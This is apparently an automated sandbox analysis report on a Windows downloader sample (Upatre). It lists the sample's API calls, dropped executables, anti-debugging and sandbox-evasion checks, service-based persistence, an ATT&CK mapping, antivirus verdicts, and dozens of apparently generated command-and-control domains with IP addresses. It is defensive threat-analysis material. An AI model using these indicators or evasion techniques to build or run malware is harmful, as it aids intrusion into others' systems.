Source: C:\Users\user\Desktop\zGIDlWIotR.exe	Command line argument: eep	0_2_00387210
Source: C:\Users\user\Desktop\zGIDlWIotR.exe	Command line argument: teTh	0_2_00387210
Source: C:\Users\user\Desktop\zGIDlWIotR.exe	Command line argument: Kern	0_2_00387210
Source: C:\Users\user\Desktop\zGIDlWIotR.exe	Command line argument: eHan	0_2_00387210
Source: C:\Users\user\Desktop\zGIDlWIotR.exe	Command line argument: Wait	0_2_00387210
Source: C:\Users\user\Desktop\zGIDlWIotR.exe	Command line argument: Crea	0_2_00387210
Source: C:\Users\user\Desktop\zGIDlWIotR.exe	Command line argument: Kern	0_2_00387210
Source: C:\Users\user\Desktop\zGIDlWIotR.exe	Command line argument: Kern	0_2_00387210
Source: C:\Users\user\Desktop\zGIDlWIotR.exe	Command line argument: Creat	0_2_00387210
Source: C:\Users\user\Desktop\zGIDlWIotR.exe	Command line argument: Creat	0_2_00387210
Source: C:\Users\user\Desktop\zGIDlWIotR.exe	Command line argument: CreateThread	0_2_00387210
Source: C:\Users\user\Desktop\zGIDlWIotR.exe	Command line argument: CreateThread	0_2_00387210
Source: C:\Users\user\Desktop\zGIDlWIotR.exe	Command line argument: SetEve	0_2_00387210
Source: C:\Users\user\Desktop\zGIDlWIotR.exe	Command line argument: SetEve	0_2_00387210
Source: C:\Users\user\Desktop\zGIDlWIotR.exe	Command line argument: CloseHandSetEve	0_2_00387210
Source: C:\Users\user\Desktop\zGIDlWIotR.exe	Command line argument: CloseHandSetEve	0_2_00387210
Source: C:\Users\user\Desktop\zGIDlWIotR.exe	Command line argument: 59<	0_2_00387210
Source: C:\Users\user\Desktop\zGIDlWIotR.exe	Command line argument: Y/\|	0_2_00387210
Source: C:\Users\user\Desktop\zGIDlWIotR.exe	Command line argument: 59<	0_2_00387210
Source: C:\Users\user\Desktop\zGIDlWIotR.exe	Command line argument: Hl	0_2_00387210
Source: C:\Users\user\Desktop\zGIDlWIotR.exe	Command line argument: Hl	0_2_00387210
Source: C:\Users\user\Desktop\zGIDlWIotR.exe	Command line argument: 59<	0_2_00387210
Source: C:\Users\user\Desktop\zGIDlWIotR.exe	Command line argument: Hl	0_2_00387210
Source: C:\Users\user\Desktop\zGIDlWIotR.exe	Command line argument: Hl	0_2_00387210
Source: C:\Users\user\Desktop\zGIDlWIotR.exe	Command line argument: (9\|'	0_2_00387210
Source: C:\Users\user\Desktop\zGIDlWIotR.exe	Command line argument: `5<	0_2_00387210
Source: C:\Users\user\Desktop\zGIDlWIotR.exe	Command line argument: (9\|'	0_2_00387210

Source: C:\helrrxxyrxmppnn\aoxsaykytfn.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\helrrxxyrxmppnn\aoxsaykytfn.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: zGIDlWIotR.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\zGIDlWIotR.exe	Code function: 0_2_003A2A15 push ecx; ret	0_2_003A2A28
Source: C:\Users\user\Desktop\zGIDlWIotR.exe	Code function: 0_2_003B5E63 push ecx; ret	0_2_003B5E76
Source: C:\helrrxxyrxmppnn\aw1j2ylb8pebwqkliimle.exe	Code function: 1_2_00F82A15 push ecx; ret	1_2_00F82A28
Source: C:\helrrxxyrxmppnn\aw1j2ylb8pebwqkliimle.exe	Code function: 1_2_00F95E63 push ecx; ret	1_2_00F95E76

Source: C:\Users\user\Desktop\zGIDlWIotR.exe

Code function: 0_2_00381380 _malloc,_memset,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetEnvironmentVariableA,CreateMutexA,CreateMutexA,CreateMutexA,GetTickCount,__itow,GetCommandLineA,__stat64i32,Sleep,__stat64i32,Sleep,Sleep,__stat64i32,GetModuleFileNameA,SetFileAttributesA,CopyFileA,SetFileAttributesA,GetCommandLineA,GetModuleFileNameA,LoadLibraryA,GetProcAddress,MessageBoxA,WSAStartup,CloseHandle,SetFileAttributesA,CopyFileA,SetFileAttributesA,Sleep,Sleep,SetFileAttributesA,CopyFileA,SetFileAttributesA,__snprintf,_memset,_memset,CreateThread,Sleep,

0_2_00381380

Source: C:\helrrxxyrxmppnn\aw1j2ylb8pebwqkliimle.exe	File created: C:\helrrxxyrxmppnn\aoxsaykytfn.exe	Jump to dropped file
Source: C:\Users\user\Desktop\zGIDlWIotR.exe	File created: C:\helrrxxyrxmppnn\aw1j2ylb8pebwqkliimle.exe	Jump to dropped file
Source: C:\helrrxxyrxmppnn\aoxsaykytfn.exe	File created: C:\helrrxxyrxmppnn\lxugwbfrq.exe	Jump to dropped file

Source: C:\Users\user\Desktop\zGIDlWIotR.exe

Code function: 0_2_0039B350 OpenSCManagerA,CreateServiceA,ChangeServiceConfig2A,OpenServiceA,StartServiceA,CloseServiceHandle,CloseServiceHandle,

0_2_0039B350

Source: C:\Users\user\Desktop\zGIDlWIotR.exe

0_2_00381380

Source: C:\helrrxxyrxmppnn\aoxsaykytfn.exe TID: 9772	Thread sleep count: 46 > 30	Jump to behavior
Source: C:\helrrxxyrxmppnn\aoxsaykytfn.exe TID: 9772	Thread sleep time: -102212s >= -30000s	Jump to behavior
Source: C:\helrrxxyrxmppnn\lxugwbfrq.exe TID: 9768	Thread sleep count: 110 > 30	Jump to behavior
Source: C:\helrrxxyrxmppnn\lxugwbfrq.exe TID: 9768	Thread sleep time: -110000s >= -30000s	Jump to behavior

Source: C:\helrrxxyrxmppnn\aw1j2ylb8pebwqkliimle.exe	Evasive API call chain: GetSystemTime,DecisionNodes	graph_1-17127
Source: C:\Users\user\Desktop\zGIDlWIotR.exe	Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes	graph_0-28924
Source: C:\helrrxxyrxmppnn\aw1j2ylb8pebwqkliimle.exe	Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes	graph_1-17031
Source: C:\Users\user\Desktop\zGIDlWIotR.exe	Evasive API call chain: GetSystemTime,DecisionNodes	graph_0-28509

Source: C:\helrrxxyrxmppnn\lxugwbfrq.exe	Last function: Thread delayed
Source: C:\helrrxxyrxmppnn\lxugwbfrq.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\zGIDlWIotR.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep	graph_0-28274
Source: C:\helrrxxyrxmppnn\aw1j2ylb8pebwqkliimle.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep	graph_1-17004
Source: C:\Users\user\Desktop\zGIDlWIotR.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess	graph_0-27771
Source: C:\helrrxxyrxmppnn\aw1j2ylb8pebwqkliimle.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess	graph_1-16343

Source: C:\Users\user\Desktop\zGIDlWIotR.exe	Code function: OpenSCManagerA,EnumServicesStatusA,GetLastError,_malloc,EnumServicesStatusA,__snprintf,_free,CloseServiceHandle,		0_2_003906A0
Source: C:\helrrxxyrxmppnn\aw1j2ylb8pebwqkliimle.exe	Code function: OpenSCManagerA,EnumServicesStatusA,GetLastError,_malloc,EnumServicesStatusA,__snprintf,_free,CloseServiceHandle,		1_2_00F706A0

Source: C:\Users\user\Desktop\zGIDlWIotR.exe	Evaded block: after key decision			graph_0-28564
Source: C:\helrrxxyrxmppnn\aw1j2ylb8pebwqkliimle.exe	Evaded block: after key decision			graph_1-17181

Source: C:\helrrxxyrxmppnn\aw1j2ylb8pebwqkliimle.exe

Code function: GetProcessHeap,LoadLibraryA,GetProcAddress,GetProcAddress,FreeLibrary,HeapAlloc,FreeLibrary,GetAdaptersInfo,HeapFree,HeapAlloc,FreeLibrary,GetAdaptersInfo,HeapFree,FreeLibrary,

1_2_00F723B0

Source: C:\helrrxxyrxmppnn\aoxsaykytfn.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\zGIDlWIotR.exe	Code function: 0_2_0038D840 Sleep,GetProcAddress,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0038D840
Source: C:\Users\user\Desktop\zGIDlWIotR.exe	Code function: 0_2_003A0649 __getdrive,FindFirstFileExA,__wfullpath_helper,_strlen,_IsRootUNCName,GetDriveTypeA,_free,___loctotime32_t,_free,__wsopen_s,__fstat32,__close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FindClose,___dtoxmode,GetLastError,__dosmaperr,FindClose,	0_2_003A0649
Source: C:\Users\user\Desktop\zGIDlWIotR.exe	Code function: 0_2_0039CDD8 __getdrive,FindFirstFileExA,__wfullpath_helper,_strlen,_IsRootUNCName,GetDriveTypeA,_free,___loctotime64_t,_free,__wsopen_s,__fstat64i32,__close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___dtoxmode,GetLastError,__dosmaperr,FindClose,	0_2_0039CDD8
Source: C:\helrrxxyrxmppnn\aw1j2ylb8pebwqkliimle.exe	Code function: 1_2_00F6D840 Sleep,GetProcAddress,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,	1_2_00F6D840
Source: C:\helrrxxyrxmppnn\aw1j2ylb8pebwqkliimle.exe	Code function: 1_2_00F7CDD8 __getdrive,FindFirstFileExA,__wfullpath_helper,_strlen,_IsRootUNCName,GetDriveTypeA,_free,___loctotime64_t,_free,__wsopen_s,__fstat64i32,__close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___dtoxmode,GetLastError,__dosmaperr,FindClose,	1_2_00F7CDD8

Source: C:\Users\user\Desktop\zGIDlWIotR.exe	API call chain: ExitProcess graph end node			graph_0-27772
Source: C:\helrrxxyrxmppnn\aw1j2ylb8pebwqkliimle.exe	API call chain: ExitProcess graph end node			graph_1-16345

Source: aw1j2ylb8pebwqkliimle.exe, 00000001.00000002.371480967.0000000000AF1000.00000004.00000020.00020000.00000000.sdmp, aoxsaykytfn.exe, 00000002.00000003.390940169.0000000000671000.00000004.00000020.00020000.00000000.sdmp, aoxsaykytfn.exe, 00000002.00000003.389663133.000000000066C000.00000004.00000020.00020000.00000000.sdmp, aoxsaykytfn.exe, 00000002.00000002.632381791.0000000000672000.00000004.00000020.00020000.00000000.sdmp, aoxsaykytfn.exe, 00000002.00000003.390014599.000000000066C000.00000004.00000020.00020000.00000000.sdmp, aoxsaykytfn.exe, 00000002.00000003.390508248.000000000066C000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\zGIDlWIotR.exe

Code function: 0_2_0039EC30 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

0_2_0039EC30

Source: C:\Users\user\Desktop\zGIDlWIotR.exe

0_2_00381380

Source: C:\Users\user\Desktop\zGIDlWIotR.exe

Code function: 0_2_003923B0 GetProcessHeap,LoadLibraryA,GetProcAddress,GetProcAddress,FreeLibrary,HeapAlloc,FreeLibrary,HeapFree,HeapAlloc,FreeLibrary,HeapFree,FreeLibrary,

0_2_003923B0

Source: C:\Users\user\Desktop\zGIDlWIotR.exe	Code function: 0_2_0039EC30 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_0039EC30
Source: C:\Users\user\Desktop\zGIDlWIotR.exe	Code function: 0_2_003A9DDD SetUnhandledExceptionFilter,	0_2_003A9DDD
Source: C:\Users\user\Desktop\zGIDlWIotR.exe	Code function: 0_2_0039BFE2 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0039BFE2
Source: C:\helrrxxyrxmppnn\aw1j2ylb8pebwqkliimle.exe	Code function: 1_2_00F7EC30 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	1_2_00F7EC30
Source: C:\helrrxxyrxmppnn\aw1j2ylb8pebwqkliimle.exe	Code function: 1_2_00F7BFE2 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_00F7BFE2

Source: C:\Users\user\Desktop\zGIDlWIotR.exe

Code function: 0_2_00391CA0 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_00391CA0

Source: C:\Users\user\Desktop\zGIDlWIotR.exe	Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,	0_2_003A7094
Source: C:\Users\user\Desktop\zGIDlWIotR.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,	0_2_003B82C3
Source: C:\Users\user\Desktop\zGIDlWIotR.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	0_2_003B7319
Source: C:\Users\user\Desktop\zGIDlWIotR.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_003BE3DC
Source: C:\Users\user\Desktop\zGIDlWIotR.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,	0_2_003BE4D1
Source: C:\Users\user\Desktop\zGIDlWIotR.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen,	0_2_003BE578
Source: C:\Users\user\Desktop\zGIDlWIotR.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,	0_2_003B558C
Source: C:\Users\user\Desktop\zGIDlWIotR.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,	0_2_003BE5D3
Source: C:\Users\user\Desktop\zGIDlWIotR.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	0_2_003B5666
Source: C:\Users\user\Desktop\zGIDlWIotR.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,	0_2_003BE7A4
Source: C:\Users\user\Desktop\zGIDlWIotR.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,	0_2_003BC7C9
Source: C:\Users\user\Desktop\zGIDlWIotR.exe	Code function: _strlen,EnumSystemLocalesA,	0_2_003BE867
Source: C:\Users\user\Desktop\zGIDlWIotR.exe	Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,	0_2_003BE890
Source: C:\Users\user\Desktop\zGIDlWIotR.exe	Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,	0_2_003BE8F7
Source: C:\Users\user\Desktop\zGIDlWIotR.exe	Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,	0_2_003BE933
Source: C:\Users\user\Desktop\zGIDlWIotR.exe	Code function: GetLocaleInfoA,	0_2_003C1B97
Source: C:\Users\user\Desktop\zGIDlWIotR.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,	0_2_003B7FA5

Source: C:\helrrxxyrxmppnn\aw1j2ylb8pebwqkliimle.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\zGIDlWIotR.exe

Code function: 0_2_003AA3B1 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

0_2_003AA3B1

Source: C:\Users\user\Desktop\zGIDlWIotR.exe

Code function: 0_2_003B3A4D __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,

0_2_003B3A4D

Source: C:\Users\user\Desktop\zGIDlWIotR.exe

Code function: 0_2_003852E0 GetProcAddress,GetVersionExA,CreateDirectoryA,DeleteFileA,RemoveDirectoryA,CreateDirectoryA,CreateDirectoryA,__snprintf,__snprintf,CreateDirectoryA,CreateDirectoryA,GetTempPathA,CreateDirectoryA,GetTempPathA,SetFileAttributesA,_memset,

0_2_003852E0

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	2 Command and Scripting Interpreter	4 Windows Service	4 Windows Service	11 Masquerading	1 Input Capture	2 System Time Discovery	Remote Services	1 Input Capture	Exfiltration Over Other Network Medium	2 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	2 Service Execution	Boot or Logon Initialization Scripts	1 Process Injection	1 Virtualization/Sandbox Evasion	LSASS Memory	121 Security Software Discovery	Remote Desktop Protocol	1 Archive Collected Data	Exfiltration Over Bluetooth	4 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	4 Native API	Logon Script (Windows)	Logon Script (Windows)	1 Process Injection	Security Account Manager	1 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	3 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	1 Deobfuscate/Decode Files or Information	NTDS	2 Process Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	3 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	2 Obfuscated Files or Information	LSA Secrets	1 System Service Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	1 File Deletion	Cached Domain Credentials	1 Remote System Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	1 System Network Configuration Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	1 File and Directory Discovery	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Masquerading	/etc/passwd and /etc/shadow	14 System Information Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
zGIDlWIotR.exe	69%	Virustotal		Browse
zGIDlWIotR.exe	84%	ReversingLabs	Win32.Downloader.Upatre
zGIDlWIotR.exe	100%	Avira	HEUR/AGEN.1316381
zGIDlWIotR.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\helrrxxyrxmppnn\aw1j2ylb8pebwqkliimle.exe	100%	Avira	HEUR/AGEN.1316381
C:\helrrxxyrxmppnn\lxugwbfrq.exe	100%	Avira	HEUR/AGEN.1316381
C:\helrrxxyrxmppnn\aoxsaykytfn.exe	100%	Avira	HEUR/AGEN.1316381
C:\helrrxxyrxmppnn\aw1j2ylb8pebwqkliimle.exe	100%	Joe Sandbox ML
C:\helrrxxyrxmppnn\lxugwbfrq.exe	100%	Joe Sandbox ML
C:\helrrxxyrxmppnn\aoxsaykytfn.exe	100%	Joe Sandbox ML
C:\helrrxxyrxmppnn\aoxsaykytfn.exe	84%	ReversingLabs	Win32.Downloader.Upatre
C:\helrrxxyrxmppnn\aw1j2ylb8pebwqkliimle.exe	84%	ReversingLabs	Win32.Downloader.Upatre
C:\helrrxxyrxmppnn\lxugwbfrq.exe	84%	ReversingLabs	Win32.Downloader.Upatre

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Link
experiencesuccess.net	3%	Virustotal	Browse
beginsuccess.net	4%	Virustotal	Browse
followsuccess.net	4%	Virustotal	Browse
crowdspring.net	4%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label
http://beginsuccess.net/index.php	0%	Avira URL Cloud	safe
http://crowdspring.net/index.php	0%	Avira URL Cloud	safe
http://partybefore.net/index.php	0%	Avira URL Cloud	safe
http://freshspring.net/index.php	0%	Avira URL Cloud	safe
http://asap.timeandfreedomteam.com/index.php	0%	Avira URL Cloud	safe
http://crowdsuccess.net/index.php	100%	Avira URL Cloud	malware
http://followsuccess.net/index.php	100%	Avira URL Cloud	malware
http://waterlanguage.net/index.php	100%	Avira URL Cloud	malware
http://thoughtlanguage.net/index.php	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
experiencesuccess.net	69.194.230.123	true	false	3%, Virustotal, Browse	unknown
beginsuccess.net	34.102.136.180	true	false	4%, Virustotal, Browse	unknown
followsuccess.net	72.1.32.168	true	false	4%, Virustotal, Browse	unknown
crowdspring.net	34.102.136.180	true	false	4%, Virustotal, Browse	unknown
thoughtlanguage.net	208.100.26.245	true	true		unknown
partybefore.net	72.26.218.86	true	true		unknown
freshspring.net	52.219.109.72	true	false		unknown
waterlanguage.net	185.230.63.171	true	false		unknown
crowdsuccess.net	34.102.136.180	true	false		unknown
fightbefore.net	unknown	unknown	true		unknown
womandevice.net	unknown	unknown	true		unknown
experiencefound.net	unknown	unknown	true		unknown
partyfound.net	unknown	unknown	true		unknown
smokespring.net	unknown	unknown	true		unknown
alreadybanker.net	unknown	unknown	true		unknown
thoughtbanker.net	unknown	unknown	true		unknown
membersuccess.net	unknown	unknown	true		unknown
waterdevice.net	unknown	unknown	true		unknown
freshfound.net	unknown	unknown	true		unknown
crowdbanker.net	unknown	unknown	true		unknown
thoughtbefore.net	unknown	unknown	true		unknown
freshbanker.net	unknown	unknown	true		unknown
fightfound.net	unknown	unknown	true		unknown
partylanguage.net	unknown	unknown	true		unknown
fightlanguage.net	unknown	unknown	true		unknown
thoughtsuccess.net	unknown	unknown	true		unknown
beginbanker.net	unknown	unknown	true		unknown
partydevice.net	unknown	unknown	true		unknown
memberspring.net	unknown	unknown	true		unknown
womanspring.net	unknown	unknown	true		unknown
knownfound.net	unknown	unknown	true		unknown
alreadysuccess.net	unknown	unknown	true		unknown
partysettle.net	unknown	unknown	true		unknown
gentlemansuccess.net	unknown	unknown	true		unknown
gentlemanspring.net	unknown	unknown	true		unknown
followspring.net	unknown	unknown	true		unknown
followbanker.net	unknown	unknown	true		unknown
summerspring.net	unknown	unknown	true		unknown
followfound.net	unknown	unknown	true		unknown
gentlemanbanker.net	unknown	unknown	true		unknown
womansettle.net	unknown	unknown	true		unknown
waterbefore.net	unknown	unknown	true		unknown
smokesuccess.net	unknown	unknown	true		unknown
watersuccess.net	unknown	unknown	true		unknown
partyspring.net	unknown	unknown	true		unknown
crowdfound.net	unknown	unknown	true		unknown
crowdbefore.net	unknown	unknown	true		unknown
summerbanker.net	unknown	unknown	true		unknown
fightsettle.net	unknown	unknown	true		unknown
smokesettle.net	unknown	unknown	true		unknown
womanlanguage.net	unknown	unknown	true		unknown
womansuccess.net	unknown	unknown	true		unknown
smokebanker.net	unknown	unknown	true		unknown
womanfound.net	unknown	unknown	true		unknown
memberfound.net	unknown	unknown	true		unknown
smokelanguage.net	unknown	unknown	true		unknown
alreadyfound.net	unknown	unknown	true		unknown
alreadyspring.net	unknown	unknown	true		unknown
smokefound.net	unknown	unknown	true		unknown
thoughtspring.net	unknown	unknown	true		unknown
watersettle.net	unknown	unknown	true		unknown
summerfound.net	unknown	unknown	true		unknown
summersuccess.net	unknown	unknown	true		unknown
summerbefore.net	unknown	unknown	true		unknown
beginspring.net	unknown	unknown	true		unknown
thoughtsettle.net	unknown	unknown	true		unknown
memberbanker.net	unknown	unknown	true		unknown
womanbanker.net	unknown	unknown	true		unknown
waterfound.net	unknown	unknown	true		unknown
thoughtdevice.net	unknown	unknown	true		unknown
thoughtfound.net	unknown	unknown	true		unknown
gentlemanfound.net	unknown	unknown	true		unknown
